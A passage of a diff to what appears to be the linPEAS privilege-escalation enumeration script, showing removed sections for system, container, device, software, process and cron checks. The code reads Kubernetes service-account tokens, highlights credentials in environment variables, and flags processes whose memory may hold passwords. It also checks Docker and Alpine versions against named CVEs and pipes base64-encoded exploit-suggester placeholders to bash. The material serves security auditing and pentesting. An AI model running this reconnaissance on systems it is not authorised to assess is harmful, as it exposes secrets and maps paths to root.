echo "Docker enummeration:" - docker_enumerated="" - - if [ "$(command -v curl)" ]; then - sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)" - dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) - echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' - if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi - fi - - if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then - sockInfoResponse="$(docker info)" - dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4) - printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' - fi - - else - echo "You don't have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_GREEN},g" - fi - done - fi -} - -checkDockerVersionExploits() { - if echo "$dockerVersion" | grep -iq "not found"; then - VULN_CVE_2019_13139="$(echo_not_found)" - VULN_CVE_2019_5736="$(echo_not_found)" - return - fi - - VULN_CVE_2019_13139="$(echo_no)" - if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1895" ]; then - VULN_CVE_2019_13139="Yes" - fi - - VULN_CVE_2019_5736="$(echo_no)" - if [ "$(echo $dockerVersion | sed 's,\.,,g')" -lt "1893" ]; then - VULN_CVE_2019_5736="Yes" - fi -} - -checkContainerExploits() { - VULN_CVE_2019_5021="$(echo_no)" - if [ -f "/etc/alpine-release" ]; then - alpineVersion=$(cat /etc/alpine-release) - if [ "$(echo $alpineVersion | sed 's,\.,,g')" -ge "330" ] && [ "$(echo $alpineVersion | sed 's,\.,,g')" -le "360" ]; then - VULN_CVE_2019_5021="Yes" - fi - fi -} - ########################################### #-----------) Some Basic Info (-----------# @@ -1068,7 +967,7 @@ elif [ "$IP" ]; then fi -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFiles || echo $CHECKS | grep -q SofI; then +if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then ########################################### #----------) Caching Finds (--------------# ########################################### @@ -1100,2326 +999,13 @@ if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks || echo $CHECKS | grep -q IntFil fi -if echo $CHECKS | grep -q SysI; then - ########################################### - #-------------) System Info (-------------# - ########################################### - print_title "System Information" - #-- SY) OS - print_2title "Operative system" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits" - (cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED}," - warn_exec lsb_release -a 2>/dev/null - if [ "$MACPEAS" ]; then - warn_exec system_profiler SPSoftwareDataType - fi - echo "" - #-- SY) Sudo - print_2title "Sudo version" - if [ "$(command -v sudo 2>/dev/null)" ]; then - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version" - sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED}," - else echo_not_found "sudo" - fi - echo "" - #--SY) USBCreator - print_2title "USBCreator" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation" - if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then - pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+") - if [ -z "$pc_version" ]; then - pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2) - fi - if [ -n "$pc_version" ]; then - pc_length=${#pc_version} - pc_major=$(echo "$pc_version" | cut -d. -f1) - pc_minor=$(echo "$pc_version" | cut -d. -f2) - if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then - echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED}," - fi - fi - fi - echo "" - #-- SY) PATH - print_2title "PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses" - echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" - echo "" - #-- SY) Date - print_2title "Date & uptime" - warn_exec date 2>/dev/null - warn_exec uptime 2>/dev/null - echo "" - #-- SY) System stats - print_2title "System stats" - (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk" - warn_exec free 2>/dev/null - echo "" - #-- SY) CPU info - print_2title "CPU info" - warn_exec lscpu 2>/dev/null - echo "" - #-- SY) Environment vars - print_2title "Environment" - print_info "Any private information inside environment variables?" - (env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set" - echo "" - #-- SY) Dmesg - print_2title "Searching Signature verification failed in dmseg" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed" - (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg" - echo "" - #-- SY) Kernel extensions - if [ "$MACPEAS" ]; then - print_2title "Kernel Extensions not belonging to apple" - kextstat 2>/dev/null | grep -Ev " com.apple." - - print_2title "Unsigned Kernel Extensions" - macosNotSigned /Library/Extensions - macosNotSigned /System/Library/Extensions - fi - - if [ "$(command -v bash 2>/dev/null)" ]; then - print_2title "Executing Linux Exploit Suggester" - print_info "https://github.com/mzet-/linux-exploit-suggester" - les_b64="peass{LES}" - echo $les_b64 | base64 -d | bash - echo "" - fi - - if [ "$(command -v perl 2>/dev/null)" ]; then - print_2title "Executing Linux Exploit Suggester 2" - print_info "https://github.com/jondonas/linux-exploit-suggester-2" - les2_b64="peass{LES2}" - echo $les2_b64 | base64 -d | perl - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Doctor Suggestions" - brew doctor - echo "" - fi - - - - #-- SY) AppArmor - print_2title "Protections" - print_list "AppArmor enabled? .............. "$NC - if [ "$(command -v aa-status 2>/dev/null)" ]; then - aa-status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then - apparmor_status 2>&1 | sed "s,disabled,${SED_RED}," - elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then - ls -d /etc/apparmor* - else - echo_not_found "AppArmor" - fi - - #-- SY) grsecurity - print_list "grsecurity present? ............ "$NC - ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") - - #-- SY) PaX - print_list "PaX bins present? .............. "$NC - (command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX") - - #-- SY) Execshield - print_list "Execshield enabled? ............ "$NC - (grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED}," - - #-- SY) SElinux - print_list "SELinux enabled? ............... "$NC - (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - #-- SY) Gatekeeper - if [ "$MACPEAS" ]; then - print_list "Gatekeeper enabled? .......... "$NC - (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," - - print_list "sleepimage encrypted? ........ "$NC - (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no - - print_list "XProtect? .................... "$NC - (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no - - print_list "SIP enabled? ................. "$NC - csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no - - print_list "Connected to JAMF? ........... "$NC - warn_exec jamf checkJSSConnection - - print_list "Connected to AD? ............. "$NC - dsconfigad -show && echo "" || echo_no - fi - - #-- SY) ASLR - print_list "Is ASLR enabled? ............... "$NC - ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null) - if [ -z "$ASLR" ]; then - echo_not_found "/proc/sys/kernel/randomize_va_space"; - else - if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi - echo "" - fi - - #-- SY) Printer - print_list "Printer? ....................... "$NC - (lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null - - #-- SY) Running in a virtual environment - print_list "Is this a virtual machine? ..... "$NC - hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor) - if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then - detectedvirt=$(systemd-detect-virt) - if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi - else - if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi - fi - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q Container; then - ############################################## - #---------------) Containers (---------------# - ############################################## - print_title "Containers" - containerCheck - - print_2title "Container related tools present" - command -v "$CONTAINER_CMDS" - - print_2title "Container details" - print_list "Is this a container? ...........$NC $containerType" - - print_list "Any running containers? ........ "$NC - # Get counts of running containers for each platform - dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) - podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) - lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) - rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) - if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then - echo_no - else - containerCounts="" - if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi - if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi - if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi - if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi - echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," - # List any running containers - if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi - if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi - if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; fi - fi - - #If docker - if echo "$containerType" | grep -qi "docker"; then - print_2title "Docker Container details" - inDockerGroup - print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Looking and enumerating Docker Sockets\n"$NC - enumerateDockerSockets - print_list "Docker version .................$NC$dockerVersion" - checkDockerVersionExploits - print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - if [ "$inContainer" ]; then - checkDockerRootless - print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," - fi - if df -h | grep docker; then - print_2title "Docker Overlays" - df -h | grep docker - fi - fi - - if [ "$inContainer" ]; then - echo "" - print_2title "Container & breakout enumeration" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname)" - if echo "$containerType" | grep -qi "docker"; then - print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" - fi - if echo "$containerType" | grep -qi "kubernetes"; then - print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" - print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" - fi - - checkContainerExploits - print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - echo "" - - print_2title "Container Capabilities" - capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" - echo "" - - print_2title "Privilege Mode" - if [ -x "$(command -v fdisk)" ]; then - if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," - else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," - fi - else - echo_not_found - fi - echo "" - - print_2title "Interesting Files Mounted" - (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" - echo "" - - print_2title "Possible Entrypoints" - ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq - echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - - -if echo $CHECKS | grep -q Devs; then - ########################################### - #---------------) Devices (---------------# - ########################################### - print_title "Devices" - - #-- 1D) sd in /dev - print_2title "Any sd*/disk* disk in /dev? (limit 20)" - ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 - echo "" - - #-- 2D) Unmounted - print_2title "Unmounted file-system?" - print_info "Check if you can mount umounted devices" - if [ -f "/etc/fstab" ]; then - grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" - else - echo_not_found "/etc/fstab" - fi - echo "" - - print_2title "Mounted disks information" - warn_exec diskutil list - echo "" - - print_2title "Mounted SMB Shares" - warn_exec smbutil statshares -a - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q AvaSof; then - ########################################### - #---------) Available Software (----------# - ########################################### - print_title "Available Software" - - #-- 1AS) Useful software - print_2title "Useful software" - command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null - echo "" - - #-- 2AS) Search for compilers - print_2title "Installed Compiler" - (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); - echo "" - - if [ "$(command -v pkg 2>/dev/null)" ]; then - print_2title "Vulnerable Packages" - pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Installed Packages" - brew list - echo "" - fi - - if [ "$MACPEAS" ]; then - print_2title "Writable Installed Applications" - system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - - system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - echo "" - - #Useless info - #print_2title "Developer Tools" - #system_profiler SPDeveloperToolsDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -fi - - -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then - #################################################### - #-----) Processes & Cron & Services & Timers (-----# - #################################################### - print_title "Processes, Cron, Services, Timers & Sockets" - - #-- PCS) Cleaned proccesses - print_2title "Cleaned processes" - if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC - fi - print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - - if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=$(print_ps) - else - (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" - fi - fi - done - pslist=$(ps auxwww) - echo "" - - #-- PCS) Binary processes permissions - print_2title "Binary processes permissions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - binW="IniTialiZZinnggg" - ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do - if [ -w "$bpath" ]; then - binW="$binW|$bpath" - fi - done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," - fi - echo "" - - #-- PCS) Files opened by processes belonging to other users - if ! [ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" - print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - echo "" - fi - - #-- PCS) Processes with credentials inside memory - print_2title "Processes with credentials in memory (root req)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" - if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi - if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi - if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi - if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi - if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi - if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi - echo "" - - #-- PCS) Different processes 1 min - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" - temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi - echo "" - fi - - #-- PCS) Cron - print_2title "Cron jobs" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" - command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - command -v incrontab 2>/dev/null || echo_not_found "incrontab" - incrontab -l 2>/dev/null - ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - crontab -l -u "$USER" 2>/dev/null | tr -d "\r" - ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths - atq 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" - ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null - echo "" - - print_2title "Writable System LaunchAgents & LaunchDemons" - find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do - program="" - program=$(defaults read "$f" Program 2>/dev/null) - if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) - fi - if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - done - echo "" - - print_2title "StartupItems" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" - ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null - echo "" - - print_2title "Login Items" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" - osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null - echo "" - - print_2title "SPStartupItemDataType" - system_profiler SPStartupItemDataType - echo "" - - print_2title "Emond scripts" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" - ls -l /private/var/db/emondClients - echo "" - fi - - #-- PCS) Services - print_2title "Services" - print_info "Search for outdated versions" - (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" - echo "" - - #-- PSC) systemd PATH - print_2title "Systemd PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" - systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" - WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") - echo "" - - #-- PSC) .service files - #TODO: .service files in MACOS are folders - print_2title "Analyzing .service files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" - printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do - if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" - fi - servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths - printf "%s\n" "$servicebinpaths\n" | while read sp; do - if [ -w "$sp" ]; then - echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" - fi - done - relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") - if [ "$relpath1" ] || [ "$relpath2" ]; then - if [ "$WRITABLESYSTEMDPATH" ]; then - echo 